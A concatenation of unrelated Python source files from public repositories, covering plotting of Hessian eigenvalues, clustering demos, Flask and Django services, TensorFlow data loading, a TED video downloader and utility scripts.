title: "gauss",
# legend_pos: "lower left",
legend_pos: "upper right",
# bbox: (0.0, 0.0),
column_nr: 3,
row_nr: 1,
legend_cols: 3,
labels: ['gauss'],
xlim: (0, 100),
ylim: (0, 100)}
colors = [get_color(color) for color in
[MY_GREEN, MY_BLUE, MY_ORANGE, MY_RED, MY_BLACK, MY_GOLD]]
markers = ["+", "o", "v", "s", "D", "^", "+"]
linestyles = [":", "-", "--", ":", "-", "--", ":", "-"]
datasets = [
original,
adversarial,
gauss,
]
# width = 12
# height = 5
# lw = 3
fig_size = 10
width = 18
height = 10
line_width = 4
markersize = 20
layout = "horizontal" # "horizontal" or "vertical"
fig = plt.figure(figsize=(len(datasets) * width, height))
xlen = 20
indexing = []
for j, dataset in enumerate(datasets):
print("dataset: ", dataset)
rows = read_rows(dataset[file_name], row_nr=dataset[row_nr])
row = rows[0]
print(f"row {j}: ", row)
eigenvalues = row
# eigenvalues.sort(reverse=True)
xlen = len(eigenvalues)
indexing = [i + 1 for i in range(xlen)]
plt.plot(indexing,
eigenvalues,
label=dataset[labels][0],
lw=line_width,
color=colors[j],
linestyle=linestyles[j],
# linestyle='None',
marker=markers[j % len(markers)],
markersize=markersize)
is_recovered = [1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 0, 1, 1, 1,
1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 0, 1, 1, 0, 1, 0, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1]
plt.plot(indexing, is_recovered, label='is recovered', linestyle='', marker='o',
markersize=markersize+2, color='red')
plt.grid()
plt.legend( # loc='upper right',
loc='center left',
ncol=1,
frameon=False,
prop={'size': legend_size},
title='Image type:',
# bbox_to_anchor=dataset[bbox]
)
plt.ylabel('eigenvalue (value)')
plt.xlabel('image index')
plt.xticks(indexing)
plt.yscale('log', basey=2)
plt.title(f'Highest eigenvalues of Hessians w.r.t. {wrt} for 62 images',
fontsize=title_size)
# plt.ylim((0,20))
# plt.xlim((0, xlen))
# plt.gcf().autofmt_xdate()
# plt.xticks(rotation=0)
# plt.interactive(False)
# plt.imshow()
# plt.subplots_adjust(hspace=0.3)
format = "pdf" # "pdf" or "png"
destination = dir_path + "/" + f"highest_eigenvalues_9_log." + format
print("destination: ", destination)
fig.savefig(destination,
bbox_inches='tight',
# transparent=True
)
# plt.show(block=False)
# plt.interactive(False)
plt.close()
| 7,325 |
vendor-local/src/django-valet-keys/setup.py
|
Mozilla-GitHub-Standards/32efa1a1fe75882ab357bdb58d92207732a76c86f080bb0f12b4b3357b38899d
| 1 |
2022691
|
#!/usr/bin/env python
from setuptools import setup
try:
import multiprocessing
except ImportError:
pass
setup(
name='django-valet-keys',
version='0.0.1',
description='Django app for managing valet keys for robots',
long_description=open('README.rst').read(),
author='<NAME>',
author_email='<EMAIL>',
url='http://github.com/lmorchard/django-valet-keys',
license='BSD',
packages=['valet_keys'],
package_data={},
classifiers=[
'Development Status :: 4 - Beta',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules',
],
install_requires=[
'django>=1.4',
],
tests_require=[
'nose',
'django-nose',
'pyquery',
'feedparser',
],
test_suite='manage.nose_collector',
)
| 1,013 |
5_clusters_basico_ao_avancado/main.py
|
kayua/Introducao-Machine-Learning
| 3 |
2024375
|
# Biblioteca para leitura de CSV
from pandas import read_csv
# Importando dependências do sklearn
from sklearn.cluster import KMeans
from sklearn.cluster import MeanShift
from sklearn.cluster import DBSCAN
from sklearn.cluster import OPTICS
from sklearn.cluster import AgglomerativeClustering
from sklearn.mixture import GaussianMixture
# Carregamento dos dados da tabela
dados_tabela = read_csv('tabela/dataset_iris.csv', usecols=[1, 2, 3, 4], engine='python')
rotulos = read_csv('tabela/dataset_iris.csv', usecols=[0], engine='python')
conjunto_de_dados = dados_tabela.values
rotulos = rotulos.values
# Conversão para float32
conjunto_de_dados = conjunto_de_dados.astype('float32')
rotulos = rotulos.astype('int32')
# recorte dos dados
dados_para_predicao = conjunto_de_dados[0:len(conjunto_de_dados), :]
rotulos = rotulos[0:len(rotulos), :]
# Aqui estão alguns algoritmos de clustering mais conhecidos
# Para utilizar um deles basta remover o comentário do algoritmo desejado e comentar os demais
# https://scikit-learn.org/stable/modules/clustering.html#clustering
resultados = KMeans(n_clusters=3, random_state=10).fit_predict(dados_para_predicao)
#resultados = MeanShift(0.8).fit_predict(dados_para_predicao)
#resultados = AgglomerativeClustering(n_clusters=3, affinity='euclidean').fit_predict(dados_para_predicao)
#resultados = DBSCAN(0.7).fit_predict(dados_para_predicao)
#resultados = OPTICS(min_samples=20, xi=.05, min_cluster_size=.05).fit_predict(dados_para_predicao)
#resultados = GaussianMixture(n_components=3, covariance_type='full').fit_predict(dados_para_predicao)
for i in range(len(resultados)):
print('Flor id: ', rotulos[i][0], " predicao: ", resultados[i])
| 1,694 |
src/largest50/models/random/truly_random.py
|
vam-sin/CATHe
| 2 |
2023149
|
import pandas as pd
import random
import pickle
import numpy as np
from sklearn.utils import resample
from sklearn.metrics import confusion_matrix, accuracy_score, f1_score, classification_report, matthews_corrcoef, balanced_accuracy_score
# dataset import
infile = open('../../data/final/top50.pickle','rb')
top50 = pickle.load(infile)
infile.close()
# train
ds_train = pd.read_csv('../../../all/data/final/Train.csv')
y_train_full = list(ds_train["SF"])
print(len(y_train_full))
train_index = ds_train.index[ds_train['SF'].isin(top50)].tolist()
train_sf = [y_train_full[k] for k in train_index]
# test
ds_test = pd.read_csv('../../../all/data/final/Test.csv')
y_test_full = list(ds_test["SF"])
test_index = ds_test.index[ds_test['SF'].isin(top50)].tolist()
y_test = [y_test_full[k] for k in test_index]
acc = []
f1 = []
mcc = []
ba = []
num_iter = 1000
for j in range(num_iter):
print(j)
y_pred = []
y_test_resample = resample(y_test, n_samples = len(y_test), random_state = 42)
for i in range(len(y_test_resample)):
y_pred.append(random.choice(train_sf))
acc.append(accuracy_score(y_test_resample, y_pred))
f1.append(f1_score(y_test_resample, y_pred, average='macro'))
mcc.append(matthews_corrcoef(y_test_resample, y_pred))
ba.append(balanced_accuracy_score(y_test_resample, y_pred))
print(np.mean(acc), np.std(acc))
print(np.mean(f1), np.std(f1))
print(np.mean(mcc), np.std(mcc))
print(np.mean(ba), np.std(ba))
# cr = classification_report(y_test, y_pred, digits=4)
# print(cr)
'''
0.02684994861253854 0.0036400137026782057
0.01607407095107804 0.002817064088301045
-9.889507646715503e-05 0.0037323095376247998
0.020449992270371805 0.005722759969054513
'''
| 1,686 |
lbt/metrics/__init__.py
|
skanjila/ludwig-benchmarking-toolkit
| 9 |
2024526
|
from lbt.metrics.base_metric import LBTMetric
import ray
import importlib
import sys
import json
import os
LOCATION = os.path.abspath(os.path.dirname(__file__))
INSTANCE_PRICES_FILEPATH = os.path.join(LOCATION, "instance_prices.json")
METRIC_REGISTERY = {}
INSTANCE_PRICES = {}
def register_metric(name):
"""
New dataset types can be added to LBT with the `register_metric`
function decorator.
:
@register_metric('personal_metric')
class PersonalMetric():
(...)
Args:
name (str): the name of the dataset
"""
def register_metric_cls(cls):
if not issubclass(cls, LBTMetric):
raise ValueError(
"Metric ({}: {}) must extend lbt.metrics.base_metric".format(
name, cls.__name__
)
)
METRIC_REGISTERY[name] = cls
return cls
return register_metric_cls
def get_experiment_metadata(
document: dict,
model_path: str,
data_path: str,
run_stats: dict,
train_batch_size: int = 16,
num_gpus=0,
):
for key, metrics_class in METRIC_REGISTERY.items():
try:
remote_class = ray.remote(num_cpus=1, num_gpus=num_gpus)(
metrics_class
).remote()
output = remote_class.run.remote(
model_path=model_path,
dataset_path=data_path,
train_batch_size=train_batch_size,
run_stats=run_stats,
)
document.update({key: ray.get(output)})
except:
print(f"FAILURE PROCESSING: {key}")
INSTANCE_PRICES = json.load(open(INSTANCE_PRICES_FILEPATH, "rb"))
PRE_BUILT_METRICS = {
"lbt_metrics": "lbt.metrics.lbt_metrics",
}
for name, module in PRE_BUILT_METRICS.items():
if module not in sys.modules:
importlib.import_module("lbt.metrics.lbt_metrics")
| 1,895 |
raspador/bot_maneuver.py
|
xyla-io/raspador
| 0 |
2022780
|
import json
import importlib
from pathlib import Path
from typing import Optional, Dict, Callable
from io_map import IOMap
from .maneuver import Maneuver, OrdnanceManeuver
from .pilot import Pilot
from .raspador import Raspador
from .user_interactor import UserInteractor
from .browser_interactor import BrowserInteractor
from .error import RaspadorBotError
class BotManeuver(OrdnanceManeuver[Pilot, Raspador]):
bot_name: Optional[str]
configuration_name: str
configuration: Dict[str, any]
browser: Optional[BrowserInteractor]
user: Optional[UserInteractor]
clear_context: bool
def __init__(self, bot_name: Optional[str]=None, configuration_name: Optional[str]='default', configuration: Dict[str, any]={}, browser: Optional[BrowserInteractor]=None, user: Optional[UserInteractor]=None, clear_context: bool=True):
self.bot_name = bot_name
self.configuration_name = configuration_name
self.configuration = configuration
self.browser = browser
self.user = user
self.clear_context = clear_context
super().__init__()
def attempt(self, pilot: Pilot, fly: Callable[[Maneuver], Maneuver], scraper: Raspador):
configuration_path = Path(__file__).parent.parent / 'configurations' / f'{self.bot_name}_configuration' / f'{self.bot_name}_configuration_{self.configuration_name}.json'
configuration = json.loads(configuration_path.read_bytes()) if configuration_path.exists() else {}
configuration.update(self.configuration)
module = importlib.import_module(self.bot_name)
try:
with IOMap._local_registries(clear=self.clear_context):
bot: Raspador = module.Bot(
browser=pilot.browser if self.browser is None else self.browser,
user=self.user,
configuration=configuration,
interactive=pilot.user.interactive if self.user is None else None
)
if self.user is None:
self.configure_user(
source_user=pilot.user,
target_user=bot.user
)
bot.scrape()
finally:
if self.browser is not None:
bot.browser.driver.quit()
bot_log = bot.flight_logs[-2]
scraper.flight_logs[-1] = scraper.flight_logs[-1].append(bot_log)
bot_error = bot_log.iloc[-1].error
if bot_error:
raise RaspadorBotError(
bot=bot,
bot_error=bot_error
)
self.load(bot)
def configure_user(self, source_user: UserInteractor, target_user: UserInteractor):
target_user.interactive = source_user.interactive
target_user.control_mode = source_user.control_mode
target_user.timeout = source_user.timeout
target_user.abbreviated_length = source_user.abbreviated_length
target_user.break_on_exceptions = source_user.break_on_exceptions
target_user.monitor = source_user.monitor
target_user.retry = source_user.retry
| 2,836 |
f3dasm/tests/abaqus/example_step.py
|
bessagroup/F3DASM
| 26 |
2022746
|
'''
Created on 2020-04-08 15:42:58
Last modified on 2020-09-30 11:37:54
@author: <NAME> (<EMAIL>)
Main goal
---------
Show how to create step using the classes defined in abaqus.modelling
'''
# imports
# abaqus
from abaqus import mdb, backwardCompatibility
# third-party
from f3dasm.abaqus.modelling.step import BuckleStep
# initialization
backwardCompatibility.setValues(reportDeprecated=False)
model_name = 'TEST-STEPS'
job_name = 'Sim_' + model_name
job_description = ''
# define materials
step_name = 'TEST_STEP'
# create model
model = mdb.Model(name=model_name)
if 'Model-1' in mdb.models.keys():
del mdb.models['Model-1']
# create step
new_step = BuckleStep(step_name)
new_step.create_step(model)
| 725 |
web_api/yonyou/resources/sale_delivery.py
|
zhanghe06/flask_restful
| 1 |
2023422
|
#!/usr/bin/env python
# encoding: utf-8
"""
@author: zhanghe
@software: PyCharm
@file: sale_delivery.py
@time: 2018-07-24 16:58
"""
from __future__ import unicode_literals
from flask import jsonify, make_response
from flask_restful import Resource, marshal, reqparse
from web_api.yonyou.outputs.sale_delivery import fields_item_sale_delivery, fields_item_sale_delivery_cn
from web_api.yonyou.reqparsers.sale_delivery import (
structure_key_item,
structure_key_items,
structure_key_item_cn,
structure_key_items_cn,
)
from web_api.commons.exceptions import BadRequest, NotFound
from web_api.yonyou.apis.sale_delivery import (
get_sale_delivery_row_by_id,
edit_sale_delivery,
delete_sale_delivery,
get_sale_delivery_limit_rows_by_last_id,
add_sale_delivery,
get_sale_delivery_pagination,
)
from web_api.commons.http_token_auth import token_auth
from web_api import app
SUCCESS_MSG = app.config['SUCCESS_MSG']
FAILURE_MSG = app.config['FAILURE_MSG']
class SaleDeliveryResource(Resource):
"""
SaleDeliveryResource
"""
decorators = [token_auth.login_required]
def get(self, pk):
"""
Example:
curl http://0.0.0.0:5000/yonyou/sale_delivery/1
:param pk:
:return:
"""
data = get_sale_delivery_row_by_id(pk)
if not data:
raise NotFound
result = marshal(data, fields_item_sale_delivery_cn, envelope=structure_key_item_cn)
return jsonify(result)
def delete(self, pk):
"""
Example:
curl http://0.0.0.0:5000/yonyou/sale_delivery/1 -X DELETE
:param pk:
:return:
"""
result = delete_sale_delivery(pk)
if result:
success_msg = SUCCESS_MSG.copy()
return make_response(jsonify(success_msg), 204)
else:
failure_msg = FAILURE_MSG.copy()
return make_response(jsonify(failure_msg), 400)
class SaleDeliveryListResource(Resource):
"""
SaleDeliveryListResource
"""
decorators = [token_auth.login_required]
def get(self):
"""
Example:
curl http://0.0.0.0:5000/yonyou/sale_deliveries
curl http://0.0.0.0:5000/yonyou/sale_deliveries?last_pk=1000&limit_num=2
:return:
"""
# 条件参数
filter_parser = reqparse.RequestParser(bundle_errors=True)
filter_parser.add_argument('last_pk', type=int, default=0, location='args')
filter_parser.add_argument('limit_num', type=int, default=20, location='args')
filter_parser_args = filter_parser.parse_args()
# data = get_sale_delivery_rows()
data = get_sale_delivery_limit_rows_by_last_id(**filter_parser_args)
result = marshal(data, fields_item_sale_delivery_cn, envelope=structure_key_items_cn)
return jsonify(result)
class SaleDeliveryPaginationResource(Resource):
"""
SaleDeliveryPaginationResource
"""
decorators = [token_auth.login_required]
def get(self):
"""
Example:
curl http://0.0.0.0:5000/yonyou/sale_deliveries/pagination
curl http://0.0.0.0:5000/yonyou/sale_deliveries/pagination?page=2000&per_page=2
:return:
"""
# 条件参数
filter_parser = reqparse.RequestParser(bundle_errors=True)
filter_parser.add_argument('page', type=int, default=1, location='args')
filter_parser.add_argument('per_page', type=int, default=20, location='args')
filter_parser_args = filter_parser.parse_args()
pagination_obj = get_sale_delivery_pagination(**filter_parser_args)
result = marshal(pagination_obj.items, fields_item_sale_delivery, envelope=structure_key_items)
result['total'] = pagination_obj.total
return jsonify(result)
| 3,823 |
age_gender/utils/dataloader.py
|
RomanSteinberg/age-gender
| 1 |
2023649
|
import os
import json
import cv2
import tensorflow as tf
from pathlib import Path
from age_gender.utils.dataset_json_loader import DatasetJsonLoader
class DataLoader:
def __init__(self, dataset_json, data_folder):
"""
Args:
data_description_path (string): json description file path.
"""
self.image_shape = [256, 256, 3]
self.data_folder = data_folder
self.description = dataset_json
def _parse_function(self, sample):
"""
Parses dict into objects and labels.
Args:
sample (dict): object description.
Returns (tuple):
Tuple which contains image, age, gender and file name.
"""
# Convert label from a scalar uint8 tensor to an int32 scalar.
age = sample['age']
gender = sample['gender']
file_path = sample['file_name']
return age, gender, os.path.join(self.data_folder, file_path)
def _generator(self):
for sample in self.description:
yield self._parse_function(sample)
def _read_image(self, age, gender, file_path):
image_string = tf.read_file(file_path)
image_tn = tf.image.decode_image(image_string, channels=3)
image_tn.set_shape([None, None, 3]) # important!
image_tn = tf.reshape(image_tn, self.image_shape)
image_tn = tf.reverse(image_tn, [-1])
# image_tn = tf.image.per_image_standardization(image_tn)
image_tn = tf.math.subtract(tf.math.divide(
tf.cast(image_tn, dtype=tf.float32), tf.constant(127.5)), tf.constant(1.0))
return image_tn, age, gender, file_path
def create_dataset(self, perform_shuffle=False, repeat_count=1, batch_size=1, num_prefetch=None,
num_parallel_calls=None):
"""
Creates tf.data.Dataset object.
Args:
perform_shuffle (bool): specifies whether it is necessary to shuffle.
repeat_count (int): specifies number of dataset repeats.
batch_size (int): specifies batch size.
Returns (tuple):
Tuple which contains images batch and corresponding batches of age labels, gender labels and file names.
"""
dataset = tf.data.Dataset.from_generator(
self._generator,
(tf.int32, tf.int32, tf.string)
)
if num_parallel_calls is not None:
dataset = dataset.map(
self._read_image, num_parallel_calls=num_parallel_calls)
else:
dataset = dataset.map(self._read_image)
if perform_shuffle:
# Randomizes input using a window of 256 elements (read into memory)
dataset = dataset.shuffle(
buffer_size=256, reshuffle_each_iteration=True)
dataset = dataset.batch(batch_size)
if num_prefetch is not None:
dataset = dataset.prefetch(num_prefetch)
return dataset.repeat(repeat_count)
def dataset_len(self):
return len(self.description)
def init_data_loader(batch_size, desc_path, images_path, balance_config=None, min_size=None, epochs=None,
num_prefetch=None, num_parallel_calls=None):
print('desc_path', desc_path)
desc = json.load(Path(desc_path).open())
if balance_config is not None:
dataset_json_loader = DatasetJsonLoader(
balance_config, desc)
desc = dataset_json_loader.get_dataset()
loader = DataLoader(desc, images_path)
repeat_count = 1
if min_size is not None and loader.dataset_len() < min_size:
repeat_count = min_size // loader.dataset_len() + (loader.dataset_len() % min_size != 0)
if epochs is not None:
repeat_count = epochs
dataset = loader.create_dataset(
perform_shuffle=True,
batch_size=batch_size,
repeat_count=repeat_count,
num_prefetch=num_prefetch,
num_parallel_calls=num_parallel_calls
)
iterator = tf.data.Iterator.from_structure(dataset.output_types, dataset.output_shapes)
next_data_element = iterator.get_next()
init_op = iterator.make_initializer(dataset)
return next_data_element, init_op, loader.dataset_len()
def visual_validation(config):
"""
Функция для валидации чтения с помощью Dataloader. Сохраняет файлы картинок на диск в experiments/test. Важно
иметь ввиду, что per_image_standardization меняет картинку так, что восстановить и посмотреть ее сложно. Поэтому
валидацию лучше запускать без испольования Dataloader-ом этого преобразования.
Args:
config (dict): конфигурационный файл.
Returns:
None
"""
dataset_path = config['init']['dataset_path']
face_area_threshold = config['face_area_threshold']
folder = os.path.join(config['working_dir'], 'experiments/test')
batch_size = 3
epochs = 2
dataset = DataLoader(dataset_path).create_dataset(True, epochs, batch_size)
iterator = dataset.make_one_shot_iterator()
all_tn = iterator.get_next()
with tf.Graph().as_default() and tf.Session() as sess:
for ep in range(epochs):
all_data = sess.run(all_tn)
ep_folder = os.path.join(folder, f'{ep}')
os.makedirs(ep_folder, exist_ok=True)
for i, data_piece in enumerate(zip(*all_data)):
print(data_piece[0].dtype)
print(i, data_piece[1], data_piece[2], data_piece[3])
p = os.path.join(folder, f'{ep}/result{i}.jpg')
cv2.imwrite(p, data_piece[0])
img = cv2.imread(data_piece[3].decode('utf-8'))
p = os.path.join(folder, f'{ep}/original{i}.jpg')
cv2.imwrite(p, img)
| 5,701 |
main.py
|
kartikgole/BlueMix1
| 0 |
2024563
|
#https://github.com/altmanWang/IBM-DB2/blob/master/Insert.py
import csv
import io
from flask import Flask, render_template, request
import time
app = Flask(__name__)
import ibm_db_dbi
cnxn = ibm_db_dbi.connect("#####;", "", "")
if cnxn:
print('database connected')
@app.route('/')
def index():
return render_template('index.html')
@app.route('/upload', methods=['POST', 'GET'])
def insert_table():
cursor = cnxn.cursor()
start_time = time.time()
cursor.execute("CREATE TABLE equake1(time varchar(50), latitude float(20), longitude float(50), depth float(50), mag float(50), magType varchar(50), nst int, gap int, dmin float(50), rms float(50),net varchar (50), id varchar(50), updated varchar(50), place varchar(50),type varchar(50),horizontal float(50), depthError float(50), magError float(50), magNst int,status varchar (50), locationSource varchar(50), magSource varchar(50))")
cnxn.commit()
if request.method == 'POST':
f = request.files['data_file']
if not f:
return "No file"
stream = io.StringIO(f.stream.read().decode("UTF8"), newline=None)
csv_input = csv.reader(stream)
next(csv_input)
for row in csv_input:
print(row)
try:
cursor.execute(
"INSERT INTO equake1(time, latitude, longitude, depth, mag, magType, nst, gap, dmin, rms, net, id, updated, place, type, horizontal, depthError, magError, magNst, status, locationSource, magSource) VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)",row)
cnxn.commit()
except Exception as e:
print(e)
cnxn.rollback()
end_time = time.time()
time_diff = end_time - start_time
return render_template('index.html',timesdiff = time_diff)
if __name__ == '__main__':
app.run(debug = True)
| 1,851 |
platforms/ted.py
|
DeathGodBXX/Video-Downloader
| 2 |
2022989
|
'''
Function:
TED演讲视频下载: https://www.ted.com/talks?language=zh-cn
Author:
Charles
微信公众号:
Charles的皮卡丘
'''
import re
import json
import requests
from utils.utils import *
requests.packages.urllib3.disable_warnings()
'''
Input:
--url: 视频地址
--savepath: 视频下载后保存的路径
Output:
--is_success: 下载是否成功的BOOL值
'''
class ted():
def __init__(self):
self.headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'
}
'''外部调用'''
def get(self, url, savepath='videos'):
video_infos = self.__getvideoinfos(url)
is_success = self.__download(video_infos, savepath)
return is_success
'''下载'''
def __download(self, video_infos, savepath):
checkFolder(savepath)
download_url = video_infos[0]
video_name = 'ted_' + video_infos[1] + '.mp4'
try:
is_success = downloadBASE(url=download_url, savename=video_name, savepath=savepath, headers=self.headers, stream=True, verify=False)
except:
is_success = False
return is_success
'''获得视频信息'''
def __getvideoinfos(self, url):
res = requests.get(url, headers=self.headers)
temp = '{' + re.findall(r'"__INITIAL_DATA__"\s*:\s*\{(.+)\}', res.text)[0]
temp_json = json.loads(temp)
title = temp_json['talks'][0]['title']
if not title:
title = 'vid' + str(temp_json['talks'][0]['downloads']['id'])
videos_dict = temp_json['talks'][0]['downloads']['nativeDownloads']
# 选择质量最好的视频下载
for quality in ['high', 'medium', 'low']:
if quality in videos_dict:
download_url = videos_dict[quality]
break
video_infos = [download_url, title]
return video_infos
'''test'''
if __name__ == '__main__':
url = 'https://www.ted.com/talks/glenn_cantave_how_augmented_reality_is_changing_activism?language=zh-tw'
ted().get(url, savepath='videos')
| 1,802 |
osmdjango/media/cartocssMaker/node_modules/grainstore/node_modules/millstone/node_modules/zipfile/deps/compress.py
|
lzxleslie/HighGis_Django
| 0 |
2023088
|
# hg clone http://hg.nih.at/libzip
# mv libzip libzip-0.11.1
# python ./compress.py libzip-0.11.1-mod2.tar.gz libzip-0.11.1
import sys
import tarfile
import os
tarball = os.path.abspath(sys.argv[1])
dirname = sys.argv[2]
tfile = tarfile.open(tarball,'w:gz')
tfile.add(dirname)
tfile.close()
sys.exit(0)
| 304 |
programs/genesis_util/generate_account_patch.py
|
JIG902/graphene
| 1,189 |
2024599
|
#!/usr/bin/env python3
import argparse
import json
import subprocess
import sys
def dump_json(obj, out, pretty):
if pretty:
json.dump(obj, out, indent=2, sort_keys=True)
else:
json.dump(obj, out, separators=(",", ":"), sort_keys=True)
return
def main():
parser = argparse.ArgumentParser(description="Generate a patch file that adds init accounts")
parser.add_argument("-o", "--output", metavar="OUT", default="-", help="output filename (default: stdout)")
parser.add_argument("-a", "--accounts", metavar="ACCOUNTS", default="-", help="file containing name, balances to create")
parser.add_argument("-p", "--pretty", action="store_true", default=False, help="pretty print output")
parser.add_argument("-s", "--secret", metavar="SECRET", default=None, help="private key generation secret")
opts = parser.parse_args()
if opts.secret is None:
sys.stderr.write("missing required parameter --secret\n")
sys.stderr.flush()
sys.exit(1)
with open(opts.accounts, "r") as f:
accounts = json.load(f)
initial_accounts = []
initial_balances = []
for e in accounts:
name = e["name"]
owner_str = subprocess.check_output(["programs/genesis_util/get_dev_key", opts.secret, "owner-"+name]).decode("utf-8")
active_str = subprocess.check_output(["programs/genesis_util/get_dev_key", opts.secret, "active-"+name]).decode("utf-8")
owner = json.loads(owner_str)
active = json.loads(active_str)
initial_accounts.append({
"name" : name,
"owner_key" : owner[0]["public_key"],
"active_key" : active[0]["public_key"],
"is_lifetime_member" : True,
})
for bal in e.get("balances", []):
bal = dict(bal)
bal["owner"] = active[0]["address"]
initial_balances.append(bal)
result = {
"append" : {
"initial_accounts" : initial_accounts },
}
if len(initial_balances) > 0:
result["append"]["initial_balances"] = initial_balances
if opts.output == "-":
dump_json( result, sys.stdout, opts.pretty )
sys.stdout.flush()
else:
with open(opts.output, "w") as f:
dump_json( result, f, opts.pretty )
return
if __name__ == "__main__":
main()
| 2,343 |
fileinfo/structure_files.py
|
klugem/recount-website
| 14 |
2023948
|
#!/usr/bin/env python
"""
structure_files.py
Symlinks to create directory structure for syncing Recount2 files with Amazon
Cloud Drive. Requires upload_table.tsv (in current directory).
Arg 1: root dir for files to upload
Arg 2: location of output of junctions_by_project.py and add_knowngene.py
"""
import sys
import os
from glob import glob
root_dir = sys.argv[1]
junctions_path = sys.argv[2]
# Create root dir if it doesn't exist
try:
os.makedirs(root_dir)
except OSError:
if os.path.exists(root_dir):
pass
else:
raise
current_project = None
for line in sys.stdin:
filename, basename, project = line.strip().split('\t')
if project != current_project:
project_dir = os.path.join(root_dir, project)
bw_dir = os.path.join(root_dir, project, 'bw')
os.makedirs(bw_dir)
current_project = project
if basename.endswith('.bw'):
os.link(filename, os.path.join(bw_dir, basename))
else:
os.link(filename, os.path.join(project_dir, basename))
os.link(
'/dcl01/leek/data/tcga_work/tcga_recount_junctions/sample_ids.tsv',
os.path.join(root_dir, 'sample_ids.tsv')
)
| 1,171 |
src/features/support.py
|
Cooomma/PyConHK-Mayday-Project
| 3 |
2024582
|
'''
Created on May 5, 2017
@author: Comma
'''
import traceback
from config.config import LogConfig, ContentConfig
from constants import conversations
from constants.stages import Stages
from constants.replykeyboards import ReplyKeyboards
from helpers.requests import RequestHelper
logger = LogConfig.logger
conversations = conversations.SupportEvents()
keyboards = ReplyKeyboards()
stage = Stages()
requests_helper = RequestHelper()
def list_events(bot, update, user_data):
update.message.reply_text(conversations.LIST_EVENTS,
reply_markup=keyboards.support_event_keyboard_markup)
return stage.SUPPORT_EVENT_START
def event_523(bot, update, user_data):
userid = update.message.from_user.id
requests_helper.send_promo_metrics(userid, '523上班餘興節目')
update.message.reply_text(conversations.EVENTS_523,
reply_markup=keyboards.support_event_keyboard_markup)
update.message.reply_text(conversations.EVENT_BACK,
reply_markup=keyboards.support_event_keyboard_markup)
return stage.SUPPORT_EVENT_START
def event_home_kong(bot, update, user_data):
userid = update.message.from_user.id
requests_helper.send_promo_metrics(userid, '《五月之約》尋回專屬HOME KONG場的感動')
update.message.reply_text(conversations.EVENT_HOME_KONG)
for pic in ['<KEY>',
'<KEY>',
'<KEY>']:
update.message.reply_photo(pic)
update.message.reply_text(conversations.EVENT_HOME_KONG_CREDIT)
update.message.reply_text(conversations.EVENT_BACK, reply_markup=keyboards.support_event_keyboard_markup)
return stage.SUPPORT_EVENT_START
| 1,672 |
Controller/cadastro_servicos.py
|
felipezago/ControleEstoque
| 0 |
2024607
|
from PyQt5 import QtGui
from PyQt5.QtWidgets import QMainWindow
class CadastroServicos(QMainWindow):
def __init__(self, parent=None):
super(CadastroServicos, self).__init__(parent)
from View.cadastro_servicos import Ui_ct_FormServicos
from PyQt5 import QtCore
from PyQt5.QtGui import QDoubleValidator
# setando View
self.ui = Ui_ct_FormServicos()
self.ui.setupUi(self)
self.dialogs = list()
self.tamanho = self.size()
self.setFixedSize(self.tamanho)
self.setWindowIcon(QtGui.QIcon("Imagens/logo_fzr.png"))
self.setWindowModality(QtCore.Qt.ApplicationModal)
self.setWindowFlags(QtCore.Qt.WindowCloseButtonHint | QtCore.Qt.WindowMinimizeButtonHint)
validator_double = QDoubleValidator(0, 9999, 4)
self.ui.tx_ValorUnitarioProduto.setValidator(validator_double)
self.ui.tx_DescricaoServico.setMaxLength(60)
self.ui.tx_ValorUnitarioProduto.textChanged.connect(self.converter_virgula)
self.ui.bt_cancelar.clicked.connect(self.sair)
self.ui.bt_salvar.clicked.connect(self.salvar)
def resizeEvent(self, a0: QtGui.QResizeEvent) -> None:
self.setFixedSize(self.tamanho)
def sair(self):
self.close()
def valida_campos(self):
if not self.ui.tx_DescricaoServico.text():
self.ui.tx_DescricaoServico.setFocus()
elif not self.ui.tx_ValorUnitarioProduto.text():
self.ui.tx_ValorUnitarioProduto.setFocus()
else:
self.salvar()
def salvar(self):
from Model.Servicos import Servicos
from PyQt5.QtWidgets import QMessageBox
descricao = self.ui.tx_DescricaoServico.text().upper()
preco = float(self.ui.tx_ValorUnitarioProduto.text())
novo_servico = Servicos()
novo_servico.descricao = descricao
novo_servico.preco = preco
try:
novo_servico.inserir_servico()
except Exception as error:
QMessageBox.about(self, "Erro", str(error))
else:
QMessageBox.about(self, "Sucesso", "Cadastro efetuado com sucesso!")
self.limpa_campos()
def converter_virgula(self):
valor = str(self.ui.tx_ValorUnitarioProduto.text())
virgula = valor.find(',')
if virgula > 0:
self.ui.tx_ValorUnitarioProduto.setText(valor.replace(",", "."))
def limpa_campos(self):
self.ui.tx_ValorUnitarioProduto.setText("")
self.ui.tx_DescricaoServico.setText("")
| 2,549 |
settings.py
|
Khamies/T5-Fine-tune-Wikihow-XSum
| 0 |
2024292
|
global_setting = {
"seed": 3111,
}
model_setting = {
"embed_size": 300,
"hidden_size": 256,
"latent_size": 16,
"note_size": 88,
"lstm_layer": 1
}
training_setting = {
"epochs": 1,
"tr_batch_size": 4,
"val_batch_size": 4,
"test_batch_size": 1,
"lr" : 0.001,
"metric": "rouge"
}
| 287 |
dataset/__init__.py
|
heebinYoo/variance-in-embedding-space
| 0 |
2024569
|
from .cars import Cars, Cars_hdf5
from .cub import CUBirds, CUBirds_hdf5, CUBirds_class, CUBirds_hdf5_alt, CUBirds_hdf5_bb
from .sop import SOProducts, SOProducts_hdf5
from .inshop import InShop, InShop_hdf5
from . import utils
"""
import resource
rlimit = resource.getrlimit(resource.RLIMIT_NOFILE)
print(rlimit)
resource.setrlimit(resource.RLIMIT_NOFILE, (rlimit[1], rlimit[1]))
"""
_type = {
'cars': Cars,
'cars_h5': Cars_hdf5,
'cub': CUBirds,
'cub_h5': CUBirds_hdf5,
'cub_class' : CUBirds_class,
'sop': SOProducts,
'sop_h5': SOProducts_hdf5,
'sop_h5_mod': SOProducts_hdf5,
